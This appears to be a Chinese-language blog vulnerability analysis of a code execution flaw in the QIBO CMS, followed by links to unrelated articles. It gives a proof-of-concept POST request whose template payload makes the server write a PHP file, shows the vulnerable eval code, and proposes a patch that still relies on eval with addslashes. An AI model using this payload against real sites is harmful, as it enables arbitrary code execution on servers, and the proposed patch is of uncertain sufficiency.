catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

这个漏洞的成因简单来说可以归纳为如下几点

. 类似于ECSHOP的的模版代码编译功能,QIBO允许在文章中添加指定格式的模版代码

. 在显示文章的时候,QIBO会使用: eval("\$rs2[title]=\"$rs2[title]\";");方式对模版动态变量进行赋值

. 黑客可以通过XSS、CSRF劫持管理员向数据库中注入恶意代码: ${@fwrite(fopen('ali.php', 'w+'), 'test’)}

. 由于PHP的动态执行特性,eval赋值的时候,在双引号中的代码会被动态执行,从而导致原本的变量赋值变成了代码执行入口

Relevant Link:

2. 漏洞触发条件

攻击向量

. 黑客需要向{$pre}jfabout数据表注入恶意代码

    ) 黑客直接拿到管理员密码,登录了后台

    ) CSRF

    ) XSS攻击

. 文章显示的时候,对模版变量进行解析,未对模版内容本身进行有效的过滤、恶意判断

0x1: POC

http://localhost/qibo/admin/index.php?lfj=jfadmin&action=addjf

POST:

title=test&content=${@fwrite(fopen('ali.php', 'w+'), 'test’)}&list=1

或者普通用户访问/do/jf.php,即可在do目录下生成ali.php文件

3. 漏洞影响范围
4. 漏洞代码分析

/do/jf.php

<?php

require(dirname(__FILE__)."/"."global.php");

$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");

while($rs = $db->fetch_array($query))

{

    $fnameDB[$rs[fid]]=$rs[name];

    $query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");

    while($rs2 = $db->fetch_array($query2))

    {

        /*

        1. 用于变量赋值的客体用双引号包裹,PHP curl syntax(${${}})可以执行

        2. 未对模版内容进行转义处理,存在闭合注入的可能

        */

        eval("\$rs2[title]=\"$rs2[title]\";");

        eval("\$rs2[content]=\"$rs2[content]\";");

        $jfDB[$rs[fid]][]=$rs2;

    }

}

require(ROOT_PATH."inc/head.php");

require(html("jf"));

require(ROOT_PATH."inc/foot.php");

?>

/hack/jfadmin/admin.php

//通过这个向量黑客可以向{$pre}jfabout数据表注入恶意代码

..

elseif($action=="addjf"&&$Apower[jfadmin_mod])

{

    $db->query("INSERT INTO `{$pre}jfabout` ( `fid` , `title` , `content`, `list` ) VALUES ( '$fid', '$title', '$content', '$list' )");

    jump("添加成功","index.php?lfj=jfadmin&job=listjf&fid=$fid",);

}

..

5. 防御方法

/do/jf.php

<?php

require(dirname(__FILE__)."/"."global.php");

$lfjdb && $lfjdb[money]=get_money($lfjdb[uid]);

$query = $db->query("SELECT * FROM {$pre}jfsort ORDER BY list");

while($rs = $db->fetch_array($query)){

    $fnameDB[$rs[fid]]=$rs[name];

    $query2 = $db->query("SELECT * FROM {$pre}jfabout WHERE fid='$rs[fid]' ORDER BY list");

    while($rs2 = $db->fetch_array($query2)){

        //eval("\$rs2[title]=\"$rs2[title]\";");

        //eval("\$rs2[content]=\"$rs2[content]\";");

        $rs2[title] = addslashes($rs2[title]);

        $rs2[content] = addslashes($rs2[content]);

        eval("\$rs2[title]='$rs2[title]';");

        eval("\$rs2[content]='$rs2[content]';");

        $jfDB[$rs[fid]][]=$rs2;

    }

}

require(ROOT_PATH."inc/head.php");

require(html("jf"));

require(ROOT_PATH."inc/foot.php");

?>

代码防御的关键点主要如下

. 将eval赋值语句内的双引号改为单引号,禁止其PHP动态执行特性

. 在参数外层包裹addslash,防止黑客注入进行闭合

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

QIBO /do/jf.php EvilCode Execution Injected By /hack/jfadmin/admin.php的更多相关文章

  1. NetBpm XML解读(5)

    原文: nPdl的翻译 在看NetBPM的nPdl文档时做了个翻译,一来是让自己能更好的理解nPdl,二来是希望能得到关心NetBPM的同志的指导.    由于对工作流不熟悉,所以有不少术语翻译没有把 ...

  2. AOP aspect XML 配置

    /** * 00配置接入点:定义一个切入点 * execution(* com.foen.foensys.controller..*.*(..))") "*" 第一个* ...

  3. Spring Boot -- Spring AOP原理及简单实现

    一.AOP基本概念 什么是AOP,AOP英语全名就是Aspect oriented programming,字面意思就是面向切面编程.面向切面的编程是对面向对象编程的补充,面向对象的编程核心模块是类, ...

  4. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  6. Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution

    EDB-ID: 41929 Author: vportal Published: 2017-04-25 CVE: N/A Type: Remote Platform: Windows Aliases: ...

  7. 执行监听器( Execution listener)

    相关类: org.activiti.engine.delegate.ExecutionListener org.activiti.engine.delegate.TaskListener org.ac ...

  8. Javascript 的执行环境(execution context)和作用域(scope)及垃圾回收

    执行环境有全局执行环境和函数执行环境之分,每次进入一个新执行环境,都会创建一个搜索变量和函数的作用域链.函数的局部环境不仅有权访问函数作用于中的变量,而且可以访问其外部环境,直到全局环境.全局执行环境 ...

  9. Error:Execution failed for task ':app:clean'.

    运行时出现 Error:Execution failed for task ':app:clean'. 错误,Builld->Clean Project即可.

随机推荐

  1. 通用权限管理系统多语言开发接口 - java,php 调用接口程序,多业务子系统集成

    1:公司里有多个业务系统,需要进行统一重构,有PHP的.有Java的.有.NET的,甚至还有delphi的. 2:公司里有多个数据库系统,有mysql的.有sqlserver的.还有oracel的,甚 ...

  2. mysql 控制台上传数据库

    运行 0.cmd1.cd/d d:\DedeAMPZ\Program\MySQL\bin2.mysql -uroot -p1234563.use 数据库名4.source   XX.sql 文件所在路 ...

  3. http://kb.cnblogs.com/zt/ef/

    http://kb.cnblogs.com/zt/ef/ http://blog.csdn.net/mackz/article/details/8605063 http://www.telerik.c ...

  4. HoloLens开发手记 - 测试 Testing

    测试HoloLens应用的做法和测试Windows应用很类似.所有常规的内容都应该被考虑在内(功能.互操作性.性能.安全性.可靠性等等),然而有些特性是HoloLens特有的,在PC或者手机上无法测试 ...

  5. Asp.Net Core-几行代码解决Razor中的嵌套if语句

    MVC开发中,经常会遇到在razor中插入简单的逻辑判断. @if (clientManager.IsAdmin) { if (!Model.Topic.Top) { <a asp-action ...

  6. node 学习笔记 - path 处理

    本文同步自我的个人博客:http://www.52cik.com/2015/12/04/learn-node-path.html path 模块是 node 用于整理.转换.合并路径的神器,只要是路径 ...

  7. [转]Android中Xposed框架篇—利用Xposed框架实现拦截系统方法

    一.前言 关于Xposed框架相信大家应该不陌生了,他是Android中Hook技术的一个著名的框架,还有一个框架是CydiaSubstrate,但是这个框架是收费的,而且个人觉得不怎么好用,而Xpo ...

  8. BI的相关问题[转]

    什么是BI? Business Intelligence(BI) = Data Warehouse(DW) + OLAP + Data Mining(DM) 商业智能=数据仓库+联机分析+数据挖掘 做 ...

  9. c/c++模板的定义和实现分开的问题及其解决方案

    注意c/c++模板的定义和实现- -                                       定义一个类一般都是在头文件中进行类声明,在cpp文件中实现,但使用模板时应注意目前的C ...

  10. 【心得】怪异的JS的Date函数

    我们知道new Date('2013/1/1')是2013年1月1日, 那么new Date('2013/1/366')会报无效日期格式吗?答案是,这是一个有效的日期,但是他是表示2014年1月1日. ...